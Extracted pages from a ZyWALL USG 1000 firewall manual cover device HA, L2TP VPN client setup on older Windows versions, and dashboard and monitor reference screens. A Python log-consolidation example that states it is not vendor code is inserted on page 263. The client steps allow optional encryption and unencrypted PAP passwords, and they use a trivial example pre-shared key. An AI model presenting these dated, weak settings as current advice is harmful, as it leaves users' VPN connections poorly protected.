Page 162: ...tional it is recommended This example uses LAN to WAN Range Specifying a Source Address is also optional although recommended This example uses LAN_SUBNET Set the Source Network Address Translation to Public IPs and click OK Figure 119 Configuring the Policy Route 7 14 How to Use Active Passive Device HA Here is an example of using device HA High Availability to backup ZyWALL A the master with ZyW...

Page 163: ... Takes Over Each ZyWALL s ge1 interface also has a separate management IP address that stays the same whether the ZyWALL functions as the master or a backup ZyWALL A s management IP address is 192 168 1 3 and ZyWALL B s is 192 168 1 5 Figure 121 Device HA Management IP Addresses 7 14 1 Before You Start ZyWALL A should already be configured You will use device HA to copy ZyWALL A s settings to B la...

Page 164: ... 255 0 as the Manage IP Subnet Mask Click OK Figure 122 Configuration Device HA Active Passive Mode Edit Master ZyWALL Example 3 Set the Device Role to Master This example focuses on the connection from the LAN ge1 to the Internet through the ge2 interface so select the ge1 and ge2 interfaces and click Activate Enter a Synchronization Password mySyncPassword in this example and click Apply Figure ...

Page 165: ...igurator Connect ZyWALL B to the Internet and subscribe it to the same subscription services like content filtering and anti virus to which ZyWALL A is subscribed See Chapter 11 on page 265 for more on the subscription services 2 In ZyWALL B click Configuration Device HA Active Passive Mode Click ge1 s Edit icon 3 Configure 192 168 1 5 as the Management IP and 255 255 255 0 as the Subnet Mask Clic...

Page 166: ...erval to 60 Click Apply Figure 126 Configuration Device HA Active Passive Mode Backup ZyWALL Example 5 Click the General tab Turn on device HA and click Apply Figure 127 Configuration Device HA General Master ZyWALL Example 7 14 4 Deploy the Backup ZyWALL Connect ZyWALL B s ge1 interface to the LAN network Connect ZyWALL B s ge2 interface to the same router that ZyWALL A s ge2 interface uses for I...

Page 167: ...een to save copies of the ZyWALLs configuration files that you can compare 2 To test your device HA configuration disconnect ZyWALL A s ge1 or ge2 interface Computers on LAN should still be able to access the Internet If they cannot check your connections and device HA configuration Congratulations Now that you have configured device HA for LAN you can use the same process for any of the ZyWALL s ...

Page 168: ...Chapter 7 Tutorials, ZyWALL USG 1000 User's Guide, 168 ...

Page 169: ...nnects through the Internet. You configure an IP address pool object named L2TP_POOL to assign the remote users IP addresses from 192.168.10.10 to 192.168.10.20 for use in the L2TP VPN tunnel. The VPN rule allows the remote user to access the LAN_SUBNET, which covers the 192.168.1.x subnet. 8.2 Configuring the Default L2TP VPN Gateway Example. 1 Click Configuration > VPN > Network > IPSec VPN > VPN Gateway to ...

Page 170: ...bnet as the specified My Address, click Configure > Network > Routing > Policy Route > Show Advanced Settings and select Use Policy Route to Override Direct Route. Select Pre-Shared Key and configure a password. This example uses top secret. Click OK. Figure 129 Configuration > VPN > IPSec VPN > VPN Gateway > Edit. 2 Select the Default_L2TP_VPN_GW entry and click Activate, and click Apply to turn on the entry. Figure 130...

Page 171: ... Advanced Settings button. Configure and enforce the local and remote policies. Create an address object that uses host type and contains the My Address IP address that you configured in the Default_L2TP_VPN_GW. The address object in this example uses the ge2 interface's IP address (172.16.1.2) and is named L2TP_IFACE. Set the Application Scenario to Remote Access (Server Role). Set the Local Policy to use...

Page 172: ...ick Configuration > VPN > L2TP VPN and configure the following. Configure an IP address pool for the range of 192.168.10.10 to 192.168.10.20. It is called L2TP_POOL here. Enable the connection. Set the VPN Connection to the Default_L2TP_VPN_Connection. Set the IP Address Pool to L2TP_POOL. This example uses the default authentication method (the ZyWALL's local user database). Select a user or group of users t...

Page 173: ... sections go along with the L2TP VPN configuration example in Section 8.1 on page 169. Before you configure the client, issue one of the following commands from the Windows command prompt to make sure the computer is running the Microsoft IPSec service. Make sure you include the quotes. For Windows XP, use net start "ipsec services". For Windows 2000, use net start "ipsec policy agent". 8.5.1 Configuring L2TP...

Page 174: ... 2 Select Connect to a workplace and click Next. Figure 134 Set up a connection or network: Choose a connection type. 3 Select Use my Internet connection (VPN). Figure 135 Connect to a workplace: How do you want to connect? ...

Page 175: ...VPN (172.16.1.2 in this example). For the Destination Name, enter L2TP to ZyWALL. Select Don't connect now; just set it up so I can connect later and click Next. Figure 136 Connect to a workplace: Type the Internet address to connect to. 5 Enter the user name and password of a user account that can use the L2TP VPN connection and click Next. Figure 137 Connect to a workplace: Type your user name and password...

Page 176: ... 6 Click Close. Figure 138 Connect to a workplace: The connection is ready to use. 7 In the Network and Sharing Center screen, click Connect to a network. Right-click the L2TP VPN connection and select Properties. Figure 139 Connect L2TP to ZyWALL ...

Page 177: ...ncryption to Optional encryption (connect even if no encryption) and the Allow these protocols radio button. Select Unencrypted password (PAP) and clear all of the other check boxes. Click OK. Figure 141 Connect ZyWALL L2TP > Security > Advanced. 10 Click Yes. When you use L2TP VPN to connect to the ZyWALL, the ZyWALL establishes an encrypted IPSec VPN tunnel first and then builds an L2TP tunnel ...

Page 178: ...Set the Type of VPN to L2TP IPSec VPN and click IPSec Settings. Figure 143 L2TP to ZyWALL Properties > Networking. 12 Select Use preshared key for authentication and enter the pre-shared key of the VPN gateway configuration that the ZyWALL is using for L2TP VPN (top secret in this example). Click OK to close the IPSec Settings window and then click OK again to close the Properties window. Figure 144 L2TP ...

Page 179: ... 13 Select the L2TP VPN connection and click Connect. Figure 145 L2TP to ZyWALL Properties > Networking. 14 Enter the user name and password of your ZyWALL user account. Click Connect. Figure 146 Connect L2TP to ZyWALL ...

Page 180: ...sword are verified and notifies you when the connection is established. Figure 147 Connecting to L2TP to ZyWALL. 16 If a window appears asking you to select a location for the network, you can select Work if you want your computer to be discoverable by computers behind the ZyWALL. Figure 148 Set Network Location ...

Page 181: ...r the network location has been set, click Close. Figure 149 Set Network Location: Successful. 18 After the connection is up, a connection icon displays in your system tray. Click it and then the L2TP connection to open a status screen. Figure 150 Connection System Tray Icon ...

Page 182: ...a status screen. Figure 151 Network and Sharing Center. 20 Click Details to see that the address you received is from the L2TP range you specified on the ZyWALL (192.168.10.10 to 192.168.10.20). Figure 152 ZyWALL L2TP Status: Details. 21 Access a server or other network resource behind the ZyWALL to make sure your access works ...

Page 183: ...VPN connection. 1 Click Start > Control Panel > Network Connections > New Connection Wizard. 2 Click Next in the Welcome screen. 3 Select Connect to the network at my workplace and click Next. Figure 153 New Connection Wizard: Network Connection Type. 4 Select Virtual Private Network connection and click Next. Figure 154 New Connection Wizard: Network Connection ...

Page 184: ... 5 Type L2TP to ZyWALL as the Company Name. Figure 155 New Connection Wizard: Connection Name. 6 Select Do not dial the initial connection and click Next. Figure 156 New Connection Wizard: Public Network ...

Page 185: ...figured as the My Address in the VPN gateway configuration that the ZyWALL is using for L2TP VPN (172.16.1.2 in this example). Figure 157 New Connection Wizard: VPN Server Selection. 8 Click Finish. 9 The Connect L2TP to ZyWALL screen appears. Click Properties > Security. Figure 158 Connect L2TP to ZyWALL (172.16.1.2) ...

Page 186: ...settings and click Settings. Figure 159 Connect L2TP to ZyWALL > Security. 11 Select Optional encryption (connect even if no encryption) and the Allow these protocols radio button. Select Unencrypted password (PAP) and clear all of the other check boxes. Click OK. Figure 160 Connect ZyWALL L2TP > Security > Advanced ...

Page 187: ...s. Figure 161 L2TP to ZyWALL Properties > Security. 13 Select the Use pre-shared key for authentication check box and enter the pre-shared key used in the VPN gateway configuration that the ZyWALL is using for L2TP VPN. Click OK. Figure 162 L2TP to ZyWALL Properties > Security > IPSec Settings ...

Page 188: ... L2TP to ZyWALL Properties > Networking. 15 Enter the user name and password of your ZyWALL account. Click Connect. Figure 164 Connect L2TP to ZyWALL. 16 A window appears while the user name and password are verified. 17 A ZyWALL L2TP icon displays in your system tray. Double-click it to open a status screen. Figure 165 ZyWALL L2TP System Tray Icon ...

Page 189: ...000. Windows 2000 does not support using pre-shared keys by default. Use the following procedures to edit the registry and then configure the computer to use the L2TP client. 8.5.3.1 Editing the Windows 2000 Registry. In Windows 2000, you need to create a registry entry and restart the computer to have it use pre-shared keys. 1 Click Start > Run. Type regedit and click OK. Figure 167 Starting the Registry E...

Page 190: ...trolSet\Services\Rasman\Parameters. Figure 168 Registry Key. 4 Right-click Parameters and select New > DWORD Value. Figure 169 New DWORD Value. 5 Enter ProhibitIpSec as the name, and make sure the Data displays as 0s. Figure 170 ProhibitIpSec DWORD Value. 6 Restart the computer and continue with the next section ...

Page 191: ...2000 IPSec Policy. After you have created the registry entry and restarted the computer, use these directions to configure an IPSec policy for the computer to use. 1 Click Start > Run. Type mmc and click OK. Figure 171 Run mmc. 2 Click Console > Add/Remove Snap-in. Figure 172 Console > Add/Remove Snap-in ...

Page 192: ...Add > IP Security Policy Management > Add > Finish. Click Close > OK. Figure 173 Add IP Security Policy Management: Finish. 4 Right-click IP Security Policies on Local Machine and click Create IP Security Policy. Click Next in the welcome screen. Figure 174 Create IP Security Policy ...

Page 193: ... 5 Name the IP security policy L2TP to ZyWALL and click Next. Figure 175 IP Security Policy Name. 6 Clear the Activate the default response rule check box and click Next. Figure 176 IP Security Policy: Request for Secure Communication ...

Page 194: ... 7 Leave the Edit Properties check box selected and click Finish. Figure 177 IP Security Policy: Completing the IP Security Policy Wizard. 8 In the properties dialog box, click Add > Next. Figure 178 IP Security Policy Properties: Add ...

Page 195: ... 9 Select This rule does not specify a tunnel and click Next. Figure 179 IP Security Policy Properties: Tunnel Endpoint. 10 Select All network connections and click Next. Figure 180 IP Security Policy Properties: Network Type ...

Page 196: ... 11 Select Use this string to protect the key exchange (preshared key), type the password in the text box and click Next. Figure 181 IP Security Policy Properties: Authentication Method. 12 Click Add. Figure 182 IP Security Policy Properties: IP Filter List ...

Page 197: ...in the Addressing tab. Select My IP Address in the Source address drop-down list box. Select A specific IP Address in the Destination address drop-down list box and type the ZyWALL's WAN IP address (172.16.1.2 in this example) in the IP Address field. Make certain the Mirrored. Also match packets with the exact opposite source and destination addresses check box is selected and click Apply. Figure 184 Fi...

Page 198: ...llowing in the Filter Properties window's Protocol tab. Set the protocol type to UDP, from port 1701. Select To any port. Click Apply, OK and then Close. Figure 185 Filter Properties: Protocol. 16 Select ZyWALL WAN_IP and click Next. Figure 186 IP Security Policy Properties: IP Filter List ...

Page 199: ...d Close. Figure 187 IP Security Policy Properties: IP Filter List. 18 In the Console window, right-click L2TP to ZyWALL and select Assign. Figure 188 Console: L2TP to ZyWALL > Assign. 8.5.3.3 Configure the Windows 2000 Network Connection. After you have configured the IPSec policy, use these directions to create a network connection ...

Page 200: ...e 189 Start New Connection Wizard. 2 Select Connect to a private network through the Internet and click Next. Figure 190 New Connection Wizard: Network Connection Type. 3 Enter the domain name or WAN IP address configured as the My Address in the VPN gateway configuration that the ZyWALL is using for L2TP VPN. Click Next. Figure 191 New Connection Wizard: Destination Address (172.16.1.2) ...

Page 201: ... 4 Select For all users and click Next. Figure 192 New Connection Wizard: Connection Availability. 5 Name the connection L2TP to ZyWALL and click Finish. Figure 193 New Connection Wizard: Naming the Connection. 6 Click Properties. Figure 194 Connect L2TP to ZyWALL ...

Page 202: ... Settings. Figure 195 Connect L2TP to ZyWALL > Security. 8 Select Optional encryption allowed (connect even if no encryption) and the Allow these protocols radio button. Select Unencrypted password (PAP) and clear all of the other check boxes. Click OK. Click Yes if a screen pops up. Figure 196 Connect L2TP to ZyWALL > Security > Advanced ...

Page 203: ...ck OK. Figure 197 Connect L2TP to ZyWALL > Networking. 10 Enter your user name and password and click Connect. It may take up to one minute to establish the connection and register on the network. Figure 198 Connect L2TP to ZyWALL. 11 A ZyWALL L2TP icon displays in your system tray. Double-click it to open a status screen. Figure 199 ZyWALL L2TP System Tray Icon ...

Page 204: ...tails and scroll down to see that the address you received is from the L2TP range you specified on the ZyWALL (192.168.10.10 to 192.168.10.20). Figure 200 L2TP to ZyWALL Status: Details. 13 Access a server or other network resource behind the ZyWALL to make sure your access works ...

Page 207: ... PART II Technical Reference ...

Page 209: ...rmation. Use the VPN status screen (see Section 9.2.1 on page 216) to look at the VPN tunnels that are currently established. Use the DHCP Table screen (see Section 9.2.5 on page 219) to look at the IP addresses currently assigned to DHCP clients and the IP addresses reserved for specific MAC addresses. Use the Current Users screen (see Section 9.2.6 on page 220) to look at a list of the users currently lo...

Page 210: ...reshing the information displayed in the widget. Refresh Now (D): Click this to update the widget's information immediately. Close this Module (E): Click this to close the widget. Use Widget Setting to re-open it. Virtual Device. Rear Panel: Click this to view details about the ZyWALL's rear panel. Hover your cursor over a connected interface or slot to display status details. Front Panel: Click this to view det...

Page 211: ...rface in the virtual router. Active: This interface is the master interface in the virtual router. Stand-By: This interface is a backup interface in the virtual router. Fault: This VRRP group is not functioning in the virtual router right now. For example, this might happen if the interface is down. n/a: Device HA is not active on the interface. Zone: This field displays the zone to which the interface is cur...

Page 212: ...over this field to display the Show Memory Usage icon that takes you to a chart of the ZyWALL's recent memory usage. Flash Usage: This field displays what percentage of the ZyWALL's onboard flash memory is currently being used. USB Storage Usage: This field displays what percentage of the USB storage device's capacity is currently being used. Active Sessions: This field displays how many traffic session...

Page 213: ...rface is not connected. For PPP interfaces: Connected: The PPP interface is connected. Disconnected: The PPP interface is not connected. If the PPP interface is disabled, it does not appear in the list. HA Status: This field displays the status of the interface in the virtual router. Active: This interface is the master interface in the virtual router. Stand-By: This interface is a backup interface in the virt...

Page 214: ...ice connected to the ZyWALL is ready for the ZyWALL to use. Unused: The ZyWALL is unable to mount a USB storage device connected to the ZyWALL. System Status. System Uptime: This field displays how long the ZyWALL has been running since it last restarted or was turned on. Current Date/Time: This field displays the current date and time in the ZyWALL. The format is yyyy-mm-dd hh:mm:ss. VPN Status: Click this...

Page 215: ...lying the system configuration. Licensed Service Status: This shows how many licensed services there are. Status: This is the current status of the license. Name: This identifies the licensed service. Version: This is the version number of the anti-virus or IDP signatures (anti-virus and IDP). Expiration: If the service license is valid, this shows when it will expire. N/A displays if the service license does n...

Page 216: ...y Signature Name. It shows the categories of intrusions. See Table 156 on page 580 for more information. Severity: This is the level of threat that the intrusions may pose. Occurrence: This is how many times the ZyWALL has detected the event described in the entry. Table 22 Dashboard (continued) LABEL / DESCRIPTION. Table 23 Dashboard > CPU Usage LABEL / DESCRIPTION. The y-axis represents the percentage of CPU usa...

Page 217: ...oard. Figure 203 Dashboard > Memory Usage. The following table describes the labels in this screen. Table 24 Dashboard > Memory Usage LABEL / DESCRIPTION. The y-axis represents the percentage of RAM usage. The x-axis shows the time period over which the RAM usage occurred. Refresh Interval: Enter how often you want this window to be automatically updated. Refresh: Click this to update the information in the wind...

Page 218: ...ard. Figure 204 Dashboard > Session Usage. The following table describes the labels in this screen. Table 25 Dashboard > Session Usage LABEL / DESCRIPTION. Sessions: The y-axis represents the number of sessions. The x-axis shows the time period over which the session usage occurred. Refresh Interval: Enter how often you want this window to be automatically updated. Refresh: Click this to update the information in ...

Page 219: ...s reserved for specific MAC addresses. To access this screen, click the icon beside DHCP Table in the dashboard. Figure 206 Dashboard > DHCP Table. Table 26 Dashboard > VPN Status LABEL / DESCRIPTION. This field is a sequential value and it is not associated with a specific SA. Name: This field displays the name of the IPSec SA. Encapsulation: This field displays how the IPSec SA is encapsulated. Algorithm: This f...

Page 220: ... sort order. Host Name: This field displays the name used to identify this device on the network (the computer name). The ZyWALL learns these from the DHCP client requests. None shows here for a static DHCP entry. MAC Address: This field displays the MAC address to which the IP address is currently assigned or for which the IP address is reserved. Click the column's heading cell to sort the table entries b...

Page 221: ...field displays the user name of each user who is currently logged in to the ZyWALL. Reauth/Lease T.: This field displays the amount of reauthentication time remaining and the amount of lease time remaining for each user. See Chapter 40 on page 699. Type: This field displays the way the user logged in to the ZyWALL. IP address: This field displays the IP address of the computer used to log in to the ZyWALL...

Page 223: ...m Status > Session Monitor screen (see Section 10.5 on page 233) to view sessions by user or service. Use the System Status > DDNS Status screen (see Section 10.6 on page 235) to view the status of the ZyWALL's DDNS domain names. The System Status > IP/MAC Binding screen (Section 10.7 on page 236) lists the devices that have received an IP address from ZyWALL interfaces with IP/MAC binding enabled. Use the Syste...

Page 224: ...n page 254) to start or stop data collection and view content filter statistics. Use the Anti-X Statistics > Content Filter > Cache screen (Section 10.18 on page 255) to view and configure your ZyWALL's URL caching. Use the Anti-X Statistics > Anti-Spam screen (Section 10.19 on page 258) to start or stop data collection and view spam statistics. Use the Anti-X Statistics > Anti-Spam > Status screen (Section 10.20 on...

Page 225: ... is not connected. Speed/Duplex: The physical port is connected. This field displays the port speed and duplex setting (Full or Half). TxPkts: This field displays the number of packets transmitted from the ZyWALL on the physical port since it was last connected. RxPkts: This field displays the number of packets received by the ZyWALL on the physical port since it was last connected. Collisions: This field di...

Page 226: ...TION. Refresh Interval: Enter how often you want this window to be automatically updated. Refresh Now: Click this to update the information in the window right away. Port Selection: Select the number of the physical port for which you want to display graphics. Switch to Grid View: Click this to display the port statistics as a table. bps: The y-axis represents the speed of transmission or reception. time: The...

Page 227: ...time the information in the window was last updated. System Up Time: This field displays how long the ZyWALL has been running since it last restarted or was turned on. Table 30 Monitor > System Status > Port Statistics > Switch to Graphic View LABEL / DESCRIPTION. Table 31 Monitor > System Status > Interface Status LABEL / DESCRIPTION. Interface Status: If an Ethernet interface does not have any physical ports associ...

Page 228: ...nterface is enabled and connected. Disconnected: The auxiliary interface is not connected. For virtual interfaces, this field always displays Up. If the virtual interface is disabled, it does not appear in the list. For VLAN and bridge interfaces, this field always displays Up. If the VLAN or bridge interface is disabled, it does not appear in the list. For PPP interfaces: Connected: The PPP interface is conne...

Page 229: ... interface. If the interface cannot use one of these ways to get or to update its IP address, this field displays n/a. Interface Statistics: This table provides packet statistics for each interface. Refresh: Click this button to update the information in the screen. Expand/Close: Click this button to show or hide statistics for all the virtual interfaces on top of the Ethernet interfaces. Name: This field d...

Page 230: ...e cases because the ZyWALL counts HTTP GET packets. Please see Table 32 on page 231 for more information. Most-used protocols or service ports and the amount of traffic on each one. LAN IP with heaviest traffic and how much traffic has been sent to and from each one. You use the Traffic Statistics screen to tell the ZyWALL when to start and when to stop collecting information for these reports. You can...

Page 231: ...fic for each one. Web Site Hits displays the most visited Web sites and how many times each one has been visited. Each type of report has different information in the report (below). Refresh: Click this button to update the report display. Flush Data: Click this button to discard all of the screen's statistics and update the report display. These fields are available when the Traffic Type is Host IP Addres...

Page 232: ...yed. The unit of measure is bytes, Kbytes, Mbytes, Gbytes or Tbytes, depending on the amount of traffic for the particular protocol or service port. The count starts over at zero if the number of bytes passes the byte count limit. See Table 33 on page 232. These fields are available when the Traffic Type is Web Site Hits. This field is the rank of each record. The domain names are sorted by the number of hi...

Page 233: ... Protocol or service port used. Source address. Destination address. Number of bytes received (so far). Number of bytes transmitted (so far). Duration (so far). You can look at all the active sessions by user, service, source IP address or destination IP address. You can also filter the information by user, protocol/service or service group, source address and/or destination address, and view it by user. Click Monit...

Page 234: ...e part of the user name or use wildcards in this field; you must enter the whole user name. Service: This field displays when View is set to all sessions. Select the service or service group whose sessions you want to view. The ZyWALL identifies the service by comparing the protocol and destination port of each packet to the protocol and port of each service that is defined. See Chapter 42 on page 721 ...

Page 235: ...ys the destination IP address and port in each active session. If you are looking at the sessions by destination IP report, click + or - to display or hide details about a destination IP address's sessions. Rx: This field displays the amount of information received by the source in the active session. Tx: This field displays the amount of information transmitted by the source in the active session. Duration: ...

Page 236: ...s the ZyWALL is currently attempting to resolve the IP address for the domain name. Last Update Time: This shows when the last attempt to resolve the IP address for the domain name occurred, in year-month-day hour:minute:second format. Table 35 Monitor > System Status > DDNS Status (continued) LABEL / DESCRIPTION. Table 36 Monitor > System Status > IP/MAC Binding LABEL / DESCRIPTION. Interface: Select a ZyWALL interfa...

Page 237: ...m Status > IP/MAC Binding (continued) LABEL / DESCRIPTION. Table 37 Monitor > System Status > Login Users LABEL / DESCRIPTION. This field is a sequential value and is not associated with any entry. User ID: This field displays the user name of each user who is currently logged in to the ZyWALL. Reauth/Lease T.: This field displays the amount of reauthentication time remaining and the amount of lease time remaining f...

Page 238: ...ellular Status. The following table describes the labels in this screen. Table 38 Monitor > System Status > Cellular Status LABEL / DESCRIPTION. Refresh: Click this button to update the information in the screen. This field is a sequential value and it is not associated with any interface. Extension Slot: This field displays where the entry's cellular card is located. Connected Device: This field displays the mo...

Page 239: ...e is searching for a network. Get signal fail: The 3G device cannot get a signal from a network. Network found: The 3G device found a network. Apply config: The ZyWALL is applying your configuration to the 3G device. Inactive: The 3G interface is disabled. Active: The 3G interface is enabled. Incorrect device: The connected 3G device is not compatible with the ZyWALL. Correct device: The ZyWALL detected a compa...

Page 240: ...een your ZyWALL and the service provider's base station. More Info: This field displays other details about the 3G connection. Table 38 Monitor > System Status > Cellular Status (continued) LABEL / DESCRIPTION. Table 39 Monitor > System Status > USB Storage LABEL / DESCRIPTION. Device description: This is a basic description of the type of USB device. Usage: This field displays how much of the USB storage device's capa...

Page 241: ...cted USB storage device was manually unmounted by using the Remove Now button, or for some reason the ZyWALL cannot mount it. Click Use It to have the ZyWALL mount a connected USB storage device. none: no USB storage device is connected. Detail: This field displays any other information the ZyWALL retrieves from the USB storage device. Deactivated: the use of a USB storage device is disabled (turned off) on...

Page 242: ...usage. This is the protocol's traffic that the ZyWALL sends to the initiator of the connection. A dotted line represents a protocol's outgoing bandwidth usage. This is the protocol's traffic that the ZyWALL sends out from the initiator of the connection. Different colors represent different protocols. Table 40 Monitor > AppPatrol Statistics > General Settings LABEL / DESCRIPTION. Refresh Interval: Select how o...

Page 243: ... application's traffic the ZyWALL has sent, in kilobytes. Dropped Data (KB): This is how much of the application's traffic the ZyWALL has discarded without notifying the client, in kilobytes. This traffic was dropped because it matched an application policy set to drop. Rejected Data (KB): This is how much of the application's traffic the ZyWALL has discarded and notified the client that the traffic was reje...

Page 244: ...und traffic. Outbound Kbps: This is the outgoing bandwidth usage for traffic that matched this protocol rule, in kilobits per second. This is the protocol's traffic that the ZyWALL sends out from the initiator of the connection. So for a connection initiated from the LAN to the WAN, the traffic sent from the LAN to the WAN is the outbound traffic. Forwarded Data (KB): This is how much of the application's t...

Page 245: ...ction initiated from the LAN to the WAN, the traffic sent from the WAN to the LAN is the inbound traffic. Outbound Kbps: This is the outgoing bandwidth usage for traffic that matched this protocol rule, in kilobits per second. This is the protocol's traffic that the ZyWALL sends out from the initiator of the connection. So for a connection initiated from the LAN to the WAN, the traffic sent from the LAN ...

Page 246: ...licies for an IPSec SA and click Search to find it. You can use a keyword or regular expression. Use up to 30 alphanumeric and _ characters. See Section 10.12.1 on page 247 for more details. Search: Click this button to search for an IPSec SA that matches the information you specified above. Disconnect: Select an IPSec SA and click this button to disconnect it. Total Connection: This field displays the tot...

Page 247: ...le VPN connection or policy name has to match if you do not use a question mark or asterisk. Encapsulation: This field displays how the IPSec SA is encapsulated. Policy: This field displays the content of the local and remote policies for this IPSec SA. The IP addresses, not the address objects, are displayed. Algorithm: This field displays the encryption and authentication algorithms used in the SA. Up Tim...

Page 248: ...L LABEL / DESCRIPTION. Disconnect: Select a connection and click this button to terminate the user's connection and delete corresponding session information from the ZyWALL. This field displays the index number. User: This field displays the account user name used to establish this SSL VPN connection. Access: This field displays the name of the SSL VPN application the user is accessing. Login Address: This f...

Page 249: ...onitor > L2TP over IPSec LABEL / DESCRIPTION. Disconnect: Select a connection and click this button to disconnect it. This is the index number of a current L2TP VPN session. User Name: This field displays the remote user's user name. Hostname: This field displays the name of the computer that has this L2TP VPN connection with the ZyWALL. Assigned IP: This field displays the IP address that the ZyWALL assigned ...

Page 250: ...s in this screen are for the time period starting at the time displayed here. The format is year, month, day and hour, minute, second. All of the statistics are erased if you restart the ZyWALL or click Flush Data. Collecting starts over and a new collection start time displays. Apply: Click Apply to save your changes back to the ZyWALL. Reset: Click Reset to return the screen to its last-saved settings. Refr...

Page 251: ... the most virus-infected files. Select Destination IP to list the most common destination IP addresses for virus-infected files that the ZyWALL has detected. This field displays the entry's rank in the list of the top entries. Virus name: This column displays when you display the entries by Virus Name. This displays the name of a detected virus. Source IP: This column displays when you display the entries by...

Page 252: ...ute, second. All of the statistics are erased if you restart the ZyWALL or click Flush Data. Collecting starts over and a new collection start time displays. Apply: Click Apply to save your changes back to the ZyWALL. Reset: Click Reset to return the screen to its last-saved settings. Refresh: Click this button to update the report display. Flush Data: Click this button to discard all of the screen's statist...

Page 253: ... top entries. Signature Name: This column displays when you display the entries by Signature Name. The signature name identifies a specific intrusion pattern. Click the hyperlink for more detailed information on the intrusion. Type: This column displays when you display the entries by Signature Name. It shows the categories of intrusions. See Table 156 on page 580 for more information. Severity: This column...

Page 254: ...displays after you click Apply. All of the statistics in this screen are for the time period starting at the time displayed here. The format is year, month, day and hour, minute, second. All of the statistics are erased if you restart the ZyWALL or click Flush Data. Collecting starts over and a new collection start time displays. Apply: Click Apply to save your changes back to the ZyWALL. Reset: Click Reset t...

Page 255: ...ration. Restricted Web Features: This is the number of web pages to which the ZyWALL did not allow access due to the content filtering custom service's restricted web features configuration. Forbidden Web Sites: This is the number of web pages to which the ZyWALL did not allow access because they matched the content filtering custom service's forbidden web sites list. URL Keywords: This is the number of...

Page 256: ...s by that column's criteria. Click the heading cell again to reverse the sort order. Figure 232 Anti-X > Content Filter > Cache. The following table describes the labels in this screen. Table 49 Anti-X > Content Filter > Cache LABEL / DESCRIPTION. URL Cache Entry. Refresh: Click this button to reload the list of content filter cache entries. Flush: Click this button to clear all web site addresses from the cache man...

Page 257: ...tes left before the URL entry is discarded from the cache. URL Cache Setup. Maximum TTL: Type the maximum time to live (TTL), 1 to 720 hours. This sets how long the ZyWALL is to keep an entry in the URL cache before discarding it. The external content filtering database frequently adds previously uncategorized web sites and sometimes changes a web site's category, so a cached entry can carry a stale category until it expires. Setting this limit higher will speed up t...

Page 258: ...his screen are for the time period starting at the time displayed here. The format is year, month, day and hour, minute, second. All of the statistics are erased if you restart the ZyWALL or click Flush Data; collecting starts over and a new collection start time displays. Apply: Click Apply to save your changes back to the ZyWALL. Reset: Click Reset to return the screen to its last saved settings. Refresh: Cl...

Page 259: ...threshold. Mail Sessions Dropped: This is how many e-mail sessions the ZyWALL dropped because they exceeded the maximum number of e-mail sessions that the anti-spam feature can check at a time. You can see the ZyWALL's threshold of concurrent e-mail sessions in the Anti-Spam > Status screen. Use the Anti-Spam > General screen to set whether the ZyWALL forwards or drops sessions that exceed this threshold; forwarding is fail-open (the excess sessions pass through without being checked for spam), dropping is fail-closed ...

Page 260: ...The lighter shaded part of the bar and the pop-up show the historical high. The first number to the right of the bar is how many e-mail sessions the ZyWALL is presently checking for spam. The second number is the maximum number of e-mail sessions that the ZyWALL can check at once. An e-mail session is when an e-mail client and e-mail server, or two e-mail servers, connect through the ZyWALL. DNSBL Stati...

Page 261: ...ess this screen, click Monitor > Log. The log is displayed in the following screen. Note: When a log reaches the maximum number of log messages, new log messages automatically overwrite existing log messages, starting with the oldest existing log message first; the on-device log is a ring buffer, so anything you need to keep for an investigation must be retained elsewhere before it is overwritten. For individual log descriptions see Appendix A on page 917. For the maximum number of log messages in the ZyWALL see Chapter 57 on page 909. Events t...

Page 262: ...Interface: This displays when you show the filter. Select the source interface of the packet that generated the log message. Destination Interface: This displays when you show the filter. Select the destination interface of the packet that generated the log message. Service: This displays when you show the filter. Select the service whose log messages you would like to see. The Web Configurator uses the pr...

Page 263: ... displays the reason the log message was generated. The text "count x", where x is a number, appears at the end of the Message field if log consolidation is turned on (see Log Consolidation in Table 248 on page 851) and multiple entries were aggregated into this one; x is the number of original events the single entry stands for. Source: This field displays the source IP address and the port number in the event that generated the log message. Destination: Thi...
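The consolidation rule described above, as an added example that is not ZyXEL's code: entries with the same category, message, source host and destination that arrive within a consolidation window are collapsed into one entry whose Message field gains "count x". The window length, the decision to ignore the source port when grouping (so that one host's repeated connections consolidate), the field names and the sample records are all assumptions made for this example.

```python
"""Log consolidation as the Monitor > Log screen describes it: identical entries
within a window collapse into one row with "count x" appended. Added example,
not ZyXEL code; window, grouping key and sample records are assumptions."""
from typing import Dict, List, Tuple

# Constructed sample records (not captured from a real device):
# (timestamp in seconds, category, message, source, destination)
SAMPLE_LOGS: List[Tuple[int, str, str, str, str]] = [
    (0, "firewall", "Match default rule, DROP", "10.0.0.5:51000", "203.0.113.9:22"),
    (2, "firewall", "Match default rule, DROP", "10.0.0.5:51001", "203.0.113.9:22"),
    (5, "firewall", "Match default rule, DROP", "10.0.0.5:51002", "203.0.113.9:22"),
    (7, "firewall", "Match default rule, DROP", "10.0.0.7:40000", "203.0.113.9:22"),
    (60, "firewall", "Match default rule, DROP", "10.0.0.5:51010", "203.0.113.9:22"),
    (61, "user", "User admin has logged in", "10.0.0.9:0", "-"),
]


def _host(addr: str) -> str:
    """Drop the port so repeated connections from one host fall into one group (assumption)."""
    return addr.rsplit(":", 1)[0]


def consolidate(records, window_sec: int = 30) -> List[Dict]:
    """Collapse identical records that arrive within window_sec of the first one in
    their group. Returns one dict per group; 'count' is the number of raw events."""
    groups = []        # each item: [first_timestamp, count, first_record]
    open_group = {}    # grouping key -> index into groups of the group still accepting entries
    for rec in sorted(records):
        ts, cat, msg, src, dst = rec
        key = (cat, msg, _host(src), dst)
        idx = open_group.get(key)
        if idx is not None and ts - groups[idx][0] <= window_sec:
            groups[idx][1] += 1          # same event again inside the window: just count it
            continue
        open_group[key] = len(groups)    # first occurrence, or the window has expired
        groups.append([ts, 1, rec])
    out = []
    for first_ts, count, (ts, cat, msg, src, dst) in groups:
        out.append({
            "time": first_ts,
            "category": cat,
            "message": msg if count == 1 else f"{msg} count {count}",
            "source": src,
            "destination": dst,
            "count": count,
        })
    return out


def total_events(consolidated: List[Dict]) -> int:
    """Number of underlying events; an incident timeline needs this, not the row count."""
    return sum(entry["count"] for entry in consolidated)
```

When you read a consolidated log during an investigation, treat "count x" as x separate events and sum the counts rather than the rows; the individual timestamps and source ports of the collapsed events are gone, so turn consolidation off if you need them.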

Page 264: ...Chapter 10 Monitor, ZyWALL USG 1000 User's Guide 264 ...

